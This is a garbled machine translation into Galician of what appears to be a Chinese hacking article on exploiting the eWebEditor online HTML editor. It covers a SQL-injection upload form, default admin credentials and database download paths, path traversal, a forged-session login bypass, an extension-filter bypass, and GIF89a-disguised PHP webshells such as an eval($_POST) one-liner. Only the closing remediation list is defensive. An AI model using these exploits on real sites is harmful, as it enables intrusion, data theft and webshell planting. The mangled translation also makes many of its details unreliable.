eWebEditor está baseada en navegador, editor WYSIWYG HTML online. Ela pode acadar moitos dos web escritorio software de edición de páxina (como por exemplo: Word) posúen unha edición visual forte. Os desenvolvedores web pódense usala para a tradicional liña de multi-Caixa de entrada de texto <TEXTAREA> substituír Caixa de entrada visual enriquecido, para que os usuarios finais poden ver a liberación do contido HTML formatado. eWebEditor! basicamente se debe publicar unha ferramenta de administración de contidos web!

A última versión 2.1.6 ewebeditor vulnerabilidade asp subida, debido ao laxismo Upload.asp filtrado, pode levar a facer a carga de vulnerabilidade, complimentary Code: 

 <h1> versión asp ewebeditor explora 2.1.6 subida ---- por <a href="http://hi.baidu.com/乔3少"> Joe tres Menos </ a> </ h1> <br> acción de formulario <= "http:// ****. con / Upload.asp? action = gardar e tipo de imaxe = & style = 3shao sindicato S_ID seleccione S_Name, S_Dir, S_CSS, S_UploadDir, S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, S_ImageExt] '2 b% | cer [', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl de ewebeditor_style onde =' standard'and'a s_name '= "un enctype =" multipart / form-data "method =" post "> <input name="uploadfile" size="100" type="file" /> <input type =" submit "value =" Ataque "/ > </ form>

Modifica-la acción por tras do enderezo, garda-lo como. Htm, pode enviar arquivo. Cer. sobre

O guión divídese polo editor principal versión 4, ASP / ASPX / PHP versións / JSP están dispoñibles para cada vulnerabilidade.
Determinar se o sitio utiliza eWebEditor
Ver o código fonte para ver unha fonte similar ewebeditor.asp "? Id =" declaración, sempre que a existencia desta declaración, realmente pode usar para xulgar un editor do sitio WEB. Outra forma é estar na noticia ou buscar fotos de outros bloques, accesorios, enlace, se o admin eWebEditor / uploadfile / xxxx.jpg como formato.
Vulnerabilidades administrador non o editor de modificar o camiño eo nome da base de datos, levando para o camiño estándar para o editor pode ser usado directamente na base de datos da descarga do sitio.
Administrador non é sobre o editor de modificar o camiño de sesión do usuario, hackers líder pode usar a rede para acceder base de datos o nome de login de usuario e contrasinal directamente ao fondo de xestión editor.
O proceso de carga vulnerabilidade WEB Editor.
ASP versión do nome do arquivo de clave e camiño do sentimento persoal é que esta versión ten, de feito, o maior impacto que o uso da barra de madrugada unha gran cantidade de estacións de asp con iso, naturalmente, é agora un gran número existente. . .
nome do ficheiro e camiño clave:
Admin_Login.asp páxina de login
Admin_Default.asp Home Management
Admin_Style.asp
Admin_UploadFile.asp
Upload.asp
Admin_ModiPwd.asp
eWebEditor.asp
db / ewebeditor.mdb camiño da base de datos estándar para a contrasinal do nome de usuario estándar para uso xeral, o fondo estándar para iso é o estándar URL:
admin www.xxx.com / ewebeditor / login_admin.asp /
Similar:
ewebeditor www.xxx.com / login_admin.asp /
admin www.xxx.com / EWEB / login_admin.asp /
www.xxx.com admin / editor / login_admin.asp /
E, basicamente, todas as contas e contrasinais estándar: admin admin (admin888)
base de datos de descarga tamén a conta eo contrasinal por defecto cambiou, podemos baixar a súa base de datos, entón a base de datos estándar de crack MD5 lugar: ... / db / ewebeditor.mdb ou ... / db / ewebeditor.asp, ollar aberto despois de que o banco de datos descarga xeral sobre ela.
File Upload fondo Iniciar, prema sobre a xestión "estilo", a lista de abaixo para ir a un determinado estilo. Nota: O estilo propio eWebEditor non se permite a reparación, por suposto, pode copiar un novo estilo para definir. Benvida do outro "tipo" add "tipo asa": o cabalo ao lado de evitar matar o sufixo ASP asa cambio de nome, volver á páxina de xestión, preme en "preview" e selecciona "Inserir outro documento botón" ASP subida de Troia: Trojan ASP subida "uploadfile" pasta.
Se o tipo de asa engadíu atopou ou non se puido cargado. Debe ser o webmaster sabe algún código, as modificacións feitas no ficheiro Upload.asp, pero non, de acordo cos hábitos comúns do pensamento, moitas veces, directamente na sAllowExt = Replace (UCase (sAllowExt), "ASP", ") 1 sobre os cambios Vin un webmaster este é modificado: sAllowExt = Replace (Replace (Replace (Replace (Replace (UCase (sAllowExt), "ASP", ")," CER ","), "ASA", ")," CDX ","), "HTR", ") A primeira vista todo de fóra, pero nós, mentres que o tipo de carga para engadir" aaspsp ", podes subir directamente asp.
Se os dous métodos anteriores fallan, use eWebEditor pode definir o tipo de ficheiros remotos automaticamente salvo, podemos engadir tipo asp. Pero como obter acceso remoto a forma de código fonte de asp ficheiro para garda-lo? Os métodos son moitos, o método máis sinxelo é o IIS no arquivo de mapeamento "aplicación" en asp "para eliminar. (Este método non é probado, sentimento persoal non utilizado)
Algúns datos da estación read-only conxunto de atributos, polo tanto non hai unha nova estación máis estilo, esta estación pode ver o seu estilo de configuración da base de datos, xeralmente máis das veces a xente tomaron as, e evidente ASA alí. Así, pode chamar directamente o estilo de construción dunha conexión para cargar escudo.
Existen estilos como o atopou na base de datos de 123 que estableza a asa pode cargalo se pode ser chamado:
http://www.xxx.com/eWeb/eWebEditor.asp?id=contentCN & Style = 123
Isto pode ser cargado directamente e, a continuación obxectivo o "Editar", vai atopar o camiño do shell. En realidade, esa vulnerabilidade é causada principalmente pola upload.asp filtro rigoroso, a nova versión debe ter fixado as versións específicas afectadas do que eu non dispoñer de datos estatísticos.
camiño Traversal
vulnerabilidade ewebeditor camiño de paso (momento en que a base de datos é só lectura) ewebeditor / admin_uploadfile.asp? id = 14 id = 14 para atrás en Engadir e dir =.. xuntos e dir =../.. ou & dir = http://www. xxxxx.com /../.. ver os arquivos do sitio, pero desta vez o exame constatou que só rexistro con éxito para realizar esta operación.
Cookie vulnerabilidade vulnerabilidade arquivo: Admin_Private.asp.
declaración de vulnerabilidade:
<% If Session (eWebEditor_User ") =" "then
Response.Redirect admin_login.asp "
Response.End
End If
Só para xulgar a sesión, as cookies non xulgar e problemas de validación de camiño.
Vulnerabilidade utilizados:
Crear nova mrchen.asp como segue:
<% Session ("eWebEditor_User") = "11111111"%>
Acceso mrchen.asp, entón acceso ao arquivo de fondo, por exemplo: Admin_Default.asp este asumir o método shell sinxelo.
versión ASPX
Javascript arquivo de subida do ficheiro afectado: eWebEditorNet / upload.aspx
Principio: o código
<form id="post" encType="server">
"Uploadfile" style = "file" size = "runat" uploadfile =
"LbtnUpload runat =
"JavaScript">
Basta a verificación de identidade, mentres que a estrutura javascript: lbtnUpload.click (); a satisfacer as condicións para acadar o efecto de cargar Trojan.
Usando o método: arquivo de Tim cer bo lugar Shell. Visita o aceite no javascript de entrada: lbtnUpload.click (); pode comezar shell, contornando as restricións, cargado con éxito arquivo ASPX. Ver código fonte despois dunha exitosa
un "lbtnUpload" javascript ": __doPostBack ('script',")"</> lbtnUpload' javascript '</>
Os arquivos gardados no enderezo subida estándar é eWebEditorNet / uploadfile / a ver se cargou con éxito.
PHP versión php versión sobre as vulnerabilidades e os eWebEditor asp mesmo. Xa a navegación de directorio. E editar a extensión. Foco, apoiando un formato php, pero non poden enviar ou carga. Sen embargo, usando invertido vulnerabilidade GIF89a organización soño se pode alcanzar palabra subida php, e despois WebShell subida.
Nota: Perseguir un soño lagoas GIF89a, precisamente DEDECMS debe ser usado na versión PHP da vulnerabilidade carga FCKeditor existe cabeceira GIF89a para enganar. DEDECMS no subida non arrastra en calquera picSubmit tratamento. Pero pode cabalo php non directamente subida. Porque vai identificar. Utilizando PHP vez pônei.
GIF89a
<? PHP
phpinfo ();
?>
RFI
GIF89a
<? PHP
eval ($ _POST [c]);
?>
Usando GIF89a foron enganados. Agora podes cargar correctamente. E entón hai unha palabra conexións cliente php.
Upload vulnerabilidades afectan as versións da versión JSP: vulnerabilidade na versión 1.4 e JSP ewebeditor versión, a vulnerabilidade ten dúas versións.
Principio: A primeira é empregar o arquivo savefile.jsp subida para realizar a operación, se pode ver a partir do código, o programa non fixo nada para subir filtro, de xeito que poidamos cargar un JSPShell o. Outra versión pode ser modificada para cambiar o código Servlet, non pode ver o código, pero o uso do método foi practicamente o mesmo.
Usando métodos: Nós imos primeiro a unha versión 1.4 da páxina seguinte subida ewebeditor JSP, seleccione un bo JSPShell. Esta non é ewebeditor no botón enviar, así que un pequeno truco aquí está a causa a carga diálogo retorna Qiaoxia transporte, preto de medio minuto, podes ver o código fonte da páxina para atopar o noso WebShell up.
Resolución
1. Modifica-la contrasinal do administrador;
2.upload.asp en:
"Baixo as circunstancias non permiten sAllowExt script asp subida = Replace (UCase (sAllowExt)," ASP ",")
Ler a:
"Baixo ningunha circunstancia non permitir arquivo script asp subida
sAllowExt = Replace (UCase (sAllowExt), "ASP", ")
sAllowExt = Replace (UCase (sAllowExt), "ASA", ")
sAllowExt = Replace (UCase (sAllowExt), "CER", ")
sAllowExt = Replace (UCase (sAllowExt), "AASPSP", ")
sAllowExt = Replace (UCase (sAllowExt), "CDX", ")
sAllowExt = Replace (UCase (sAllowExt), "HTR", ")
3. Admin_Private.asp:
Se Session (eWebEditor_User ") =" "then
Resposta. Redirect admin_login.asp "
Resposta. Fin
End If
Ler a:
Se Session (eWebEditor_User ") =" "e IsSelfRefer () then
Response.Redirect admin_login.asp "
Response.End
End If
4. Para db / ewebeditor.mdb nome da base de arquivo cambiouse a outros caracteres que contén o nome do ficheiro # e así por diante;
5. O IIS no arquivo de mapeamento "aplicación" en asp "excluído;
6. Aínda ten problemas de arquivo admin_login.asp borrar. 

  Transferencia de: http://www.swhack.cn/article.asp?id=111

Podes estar interesado no artigo seguinte ↓